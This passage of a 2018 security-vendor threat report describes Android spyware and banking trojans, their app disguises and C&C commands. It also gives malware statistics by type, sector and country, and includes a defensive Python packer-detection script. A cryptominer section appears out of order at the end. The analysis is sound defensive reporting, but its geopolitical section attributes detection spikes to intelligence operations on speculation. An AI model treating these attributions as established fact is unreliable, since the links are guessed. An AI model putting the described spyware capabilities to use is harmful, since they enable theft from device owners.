The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.

In addition to the abilities of the previous versions, it includes some additional tricks:

Extracts photos, audio and videos

Records the screen

Executes shell commands

Records calls

4.1.3 MikeSpy

Some spyware specifically hunts for messenger data, like the next digital spook, MikeSpy.

Virtual Girlfriend

Disguises of MikeSpy

MikeSpy camouflages itself as a Virtual Girlfriend application. But instead of a girlfriend it delivers a bundle of malicious abilities:

Takes control of the Bluetooth adapter

Extracts data about accounts, contact details and installed apps

Extracts data from the WhatsApp Message DB and related keys

Uploads the collected data to the cybercriminals' server via FTP

4.1.4 Xloader

The next spyware, Xloader, combines spying with a purposeful hunt for banking applications on the device. It uses trust-inspiring cover icons imitating Facebook and Google Chrome.

Version 1 to Version 3: FaceBook, Chrome

Disguises of Xloader

After infection, Xloader connects to its C&C server and executes the following commands:

Extract the device information

Delete SMS

Set ringer mode

Monitor incoming SMS messages

Clear memory

Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs

Extract contacts details

Keep Wi-Fi always turned on

Version 2 can execute additional commands:

Send SMS and read outgoing SMS

Enable and disable a Wi-Fi connection

Access a location specified by the attackers

Make recordings

Make calls

4.1.5 Stalker Spy

The next malware in our list is Stalker Spy. As you can see, it is the champion in the number of masks it puts on to deceive users.

App Distribution

FlexiSpy MBackup

HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service

Mobile Spy

随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z

CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻

Disguises of Stalker Spy

In addition to the usual must-have spyware toolset, Stalker Spy can remotely turn on the microphone of the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.

4.1.6 Mystery Bot

The next malware is much more than a spy. The first version of Mystery Bot combines spyware that steals information with a banking trojan that connects to the C&C server of LokiBot. The second version of Mystery Bot is ransomware that encrypts files on external storage; after encryption the malware deletes the original files. So we can call it a spy with a "007 license".

Version 1: Adobe Flash Player

Version 2: Flash Player

Disguises of Mystery Bot

Mystery Bot comes disguised as Adobe Flash Player. Below is a list of some of the commands the malware can execute on your device:

Send_SMS: extract SMS content and send it to the C&C server

Send_USSD: send the USSD to the C&C server

Gethistory: monitor browser history

Start_AllApp: gather info about installed applications

Send_call: set the Intent action to call

Forward_call: forward incoming calls

ResForward_call: reset call forwarding

Go_Smsmnd: delete SMS content

Go_GetAlls: get SMS history

Dell_sms: delete SMS content in a conversation

Send_spam: send spam SMS

Start_Inject: call the injector class

4.1.7 FakeSpy

FakeSpy also has many masks, which you can see in the screenshot:

佐川急便 현대캐피탈

Disguises of FakeSpy

It collects the available information from the infected device and sends it to the C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp

Here are some commands from its Command and Control server:

contacts: get contact details and email ID

Mute: set action to mute

Mms: get MMS content

info: get device information

4.1.8 RedAlert

RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

Version 1: EbookReader, Update Flash Player, Android Update, WhatsApp, Viber

Version 2: Update Google Market, Flash Player, Tactic FlashLight

Disguises of RedAlert

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device for the following bank applications:

de.postbank.finanzassistent

pl.mbank

aib.ibank.android

The second version can also block access to some apps and websites, including Google Chrome, the Google Play Store, Gmail and YouTube.

4.1.9 Hero Rat

The next digital spook, Hero Rat, operates mostly in Iran. It spreads through third-party app stores, social networks and messengers.

Version 1

CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره

Proxy دوست یاب Telegram Ton

شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان

Disguises of Hero Rat

Its code is available on a Telegram hacking channel. Notably, it is sold in three tiers: bronze, silver and gold.

After infiltrating a victim's device, Hero Rat shows a warning such as "app can't be run", but it keeps running in the background and starts its spying activity. It steals text messages and audio recordings, makes calls, determines the device's location, etc. The newly infected device is controlled via Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get Free Followers and Telegram versions for the Iranian market.

4.1.10 Sonvpay

The next malware, Sonvpay, also wears many masks, but it is more a fraudster than a spy.

Version 1

Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot

Reccoder-Call QRCodeBar Scanner APK

Let me love you ringtone Iphone Ringtone Night light

Beauty camera-Photo editor Shape of you ringtone

Disguises of Sonvpay

Sonvpay covertly subscribes infected devices to WAP and SMS services that add extra charges to the owner's mobile bill. Once installed, the malware displays a fake notification with a "skip" option. If you tap this button, the malware begins working in the background, subscribing the user to services she did not order.

It reaches victims in the variety of disguises named above.

4.1.11 CoinHive

The last one in our Q2 Android malware list is CoinHive. We mentioned it earlier in the report; here is the version for Android devices. CoinHive for Android comes in three versions, each of which updates its mining potential. It is disseminated via the counterfeit apps you see below, but one of the vectors is especially interesting.

Version 1: Netflix Hack, Instagram Hack

Version 2: TSF Launcher

Version 3: Android Service, PlacarTv Futebol Ao Vivo

Disguises of CoinHive

The malware is covertly propagated via ... another cryptominer, named CoinMiner.

How is that possible? Imagine a cybercriminal who wants to infect victims with a cryptominer to use their resources for mining. She chooses CoinMiner for the purpose, downloads it and implants it on the victims' machines. What she does not know is that another cybercriminal had earlier infected CoinMiner with CoinHive. So the first attacker is herself a victim: a thief robbing a thief.

This story neatly illustrates the state of cybersecurity in Q2: no one can feel totally secure. Even a predator can turn into prey in seconds.

4.2 Android Malware Catalogued by Month

Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

Android-targeted malware in April

4.2.2 May 2018

Android-targeted malware in May

4.2.3 June 2018

Android-targeted malware in June

5 Malware in Q2 2018: The Big Picture

Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections across 237 country-code top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.

5.1 Strategic Threat: Computer Worms

A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network-exposed services as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and potentially cause a denial of service. For this Q2 2018 report we place worms in a special category called "Strategic Threat" because of their ability to travel very quickly across the Internet and compromise many computers at once.

5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing the planet for over a decade, ranked as the top computer worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.

5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses the share from a local area network (LAN) or company intranet.

In Q2 2018 Allaple was the most common Net Worm detected. Microsoft describes it as a "multi-threaded, polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.

5.1.3 Email Worms

Email worms are nasty in that, besides mailing themselves to addresses harvested from the victim, they can travel between computers by other means, for example via exploits and autorun functionality.

This quarter the most common Email Worm by far was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2.

5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without a centralized administrative system. Such networks are commonly used to share files, such as unauthorized copies of books and films, and attackers take advantage of this to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory-resident" virus that infects .exe and .scr files and may use the Gnutella p2p protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.

And this timeline shows that Russia suffered not just one p2p Worm outbreak but many.

5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant-messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of the well-known Yahos IM Worm, which in 2012 led the FBI to arrest 10 people for spreading banking malware via social networks.

This timeline shows that, while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.

5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. Once installed on a system or network, however, they can be devastating to personal or enterprise security.

5.2.1 Backdoors

A backdoor is a hidden way to bypass normal authentication, often used to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected in Q2 2018 was DarkComet, a remote access trojan (RAT) that is fully 10 years old. This malware allows an attacker to control a compromised system through a graphical user interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo's Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.

5.2.2 Viruses

A computer virus is self-replicating code that "infects" other programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot reach another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable (.exe) and HTML files and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries, especially developing countries, were affected.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.

5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.


5.2.4 Exploits

Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial-of-service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (.pdf) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.


5.3 Medium Threat Malware

In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.


5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.


5.3.2 Packers

Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems, and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
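A practical check a defender can run against the packing technique just described, added here as an example and not part of Comodo's report or tooling: it walks a PE file's section table and flags UPX-style section names and near-random (high-entropy) section data, which is what compression or encryption of the payload leaves behind. The entropy threshold and the two in-memory sample images are constructed assumptions, and the check applies to any packer that leaves compressed or encrypted sections, not only MUPX.

```python
"""Packed-PE heuristic: UPX-style section names plus Shannon entropy.

Added example for this report, not Comodo's code or tooling. It parses the
PE section table by hand (no third-party libraries) and flags images whose
sections carry the default UPX names or whose raw data is near-random, the
usual signs of a compressed or encrypted payload. Both PE images below are
constructed in memory so the script runs offline.
"""
import hashlib
import math
import struct

# Default section names written by stock UPX; MUPX builds often keep them.
UPX_SECTION_NAMES = {"UPX0", "UPX1", "UPX2"}
# Assumed threshold: compressed/encrypted data scores above 7.0 bits per byte,
# while ordinary x86 code usually lands between 5.5 and 6.5.
HIGH_ENTROPY = 7.0


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty input, at most 8.0."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_sections(image: bytes):
    """Yield (name, raw_bytes) for every section header in a PE image."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                      # IMAGE_FILE_HEADER
    (num_sections,) = struct.unpack_from("<H", image, coff + 2)
    (opt_size,) = struct.unpack_from("<H", image, coff + 16)
    offset = coff + 20 + opt_size            # first IMAGE_SECTION_HEADER
    for _ in range(num_sections):
        name, _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from(
            "<8sIIII", image, offset)
        yield (name.rstrip(b"\0").decode("ascii", "replace"),
               image[raw_ptr:raw_ptr + raw_size])
        offset += 40


def packer_indicators(image: bytes) -> list:
    """Return human-readable reasons the image looks packed; empty means clean."""
    reasons = []
    for name, raw in pe_sections(image):
        if name in UPX_SECTION_NAMES:
            reasons.append(f"section {name}: UPX-style section name")
        entropy = shannon_entropy(raw)
        if raw and entropy > HIGH_ENTROPY:
            reasons.append(f"section {name}: entropy {entropy:.2f} bits/byte")
    return reasons


def build_pe(sections) -> bytes:
    """Assemble a minimal PE image from [(name, raw_bytes)]; constructed test input."""
    e_lfanew, opt_size = 0x40, 0xE0          # PE32 optional header, zero-filled
    data_start = e_lfanew + 4 + 20 + opt_size + 40 * len(sections)
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    table, blobs, offset = b"", b"", data_start
    for name, raw in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode(), len(raw), 0x1000,
                             len(raw), offset, 0, 0, 0, 0, 0x60000020)
        blobs += raw
        offset += len(raw)
    return dos + b"PE\0\0" + coff + b"\0" * opt_size + table + blobs


def pseudo_random_bytes(n: int) -> bytes:
    """Deterministic high-entropy filler standing in for compressed code."""
    out = b"".join(hashlib.sha256(i.to_bytes(4, "little")).digest()
                   for i in range(n // 32 + 1))
    return out[:n]


# Constructed samples: a UPX-style layout (empty UPX0, dense UPX1) and a plain build.
PACKED_SAMPLE = build_pe([("UPX0", b""), ("UPX1", pseudo_random_bytes(4096))])
CLEAN_SAMPLE = build_pe([(".text", b"\x55\x8b\xec" * 300 + b"\xc3"),
                         (".data", b"\0" * 512)])

if __name__ == "__main__":
    for label, img in (("packed", PACKED_SAMPLE), ("clean", CLEAN_SAMPLE)):
        hits = packer_indicators(img)
        print(f"{label}: {'PACKED' if hits else 'no indicators'}")
        for reason in hits:
            print("  -", reason)
```

Run it against real files by reading them into `image` in place of the constructed samples; a high-entropy `.rsrc` section on its own is common in legitimate installers, so treat entropy as a triage signal rather than a verdict.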

In Q2 2018, Russia was the #1 home to malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.


5.3.3 Email Flooder

Email Flooders are malware used to overwhelm email servers with messages in order to "kill" them or shut them down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email, but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that, while the number of Palevo detections was not high, it was still a persistent threat in Germany.


5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.


5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information, but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware

In this timeline you can see that this malware type is not numerous – but still something to be aware of.


5.4 Low Threat Malware Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.


5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application" or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.


5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.


5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs, but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US – and to a lesser extent Ukraine – have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.


6 Vertical analysis

In this section, let's examine unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.


First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites, and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today, the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.

In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.


7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities. After which, these agencies immediately began to fulfill these requirements via computer hacking – commonly called cyber espionage – which today takes place on a far greater scale than the public realizes.


7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services – both foreign and domestic – were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.


7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online. Students collect data for academic papers; spies collect data for intelligence reports.


7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual, or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.


7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities – from social activities to business, politics or national security affairs – are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information – or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.


7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.


7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection – and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.


7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".


7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike – by far – occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa – precisely where the summit was scheduled to take place.


8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world, but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, sophisticated in persistence and much harder to detect by antivirus software. Propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.


About Comodo Cybersecurity

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.


3 Cryptominer Evolution

Going Fileless, Killing Competitors, Crashing Systems

Cryptominers do not lead the Q2 malware pack, but that does not mean that their impact is greatly diminished. On the contrary, current cryptominer behavior recalls that of an army preparing for battle: training and reprovisioning to fight more efficiently. Cryptominers are quickly developing and gaining new, dangerous abilities.

Earlier cryptomining examples were only able to use infected machine resources to mine cryptocurrency on behalf of the attackers. For that reason, many users did not regard them as particularly dangerous: at least, cryptominers did not steal information or destroy data like other malware, but merely sucked up CPU resources. Moreover, they typically do not employ strong obfuscation and can be easily discovered and deleted.

But Q2 events clearly showed that the situation has radically changed.

New samples of cryptominers detected by Comodo malware analysts exhibit far more harmful abilities than those required for merely mining cryptocurrency. These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals. They are learning to hide and fight against antimalware tools. They can camouflage themselves, kill competing cryptominers and even crash user systems if met with an attempt to delete the malware.

3.1 BadShell attacks enterprises

Fileless malware is next-generation malware, especially compared with traditional infection via .exe files. File-based malware resides on the hard drive, making it easier to detect. But fileless malware is different. As its name suggests, this type of malware represents malicious code injected into legitimate OS processes. It need not be installed on a victim machine but functions only in memory, making it much harder for antiviruses to detect.

Usually such malware is spread via malicious ad banners. Clicking on a banner redirects a user to an infected website, where the malware covertly installs itself into the victim's computer. As many antivirus tools cannot detect it, users remain unaware of being infected. Not surprisingly, its use by cybercriminals is on the increase.

Last quarter, Comodo Threat Research Labs analysts faced a scenario of just such an attack. A company with several thousand endpoints was compromised by fileless malware. When their legacy security software failed to protect them, the company looked to Comodo Threat Research Labs for assistance.


Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows processes: PowerShell to execute commands, Task Scheduler to ensure persistence and the Registry to hold the malicious binary code. In the screenshots below you see exactly how the malware, dubbed BadShell, works.

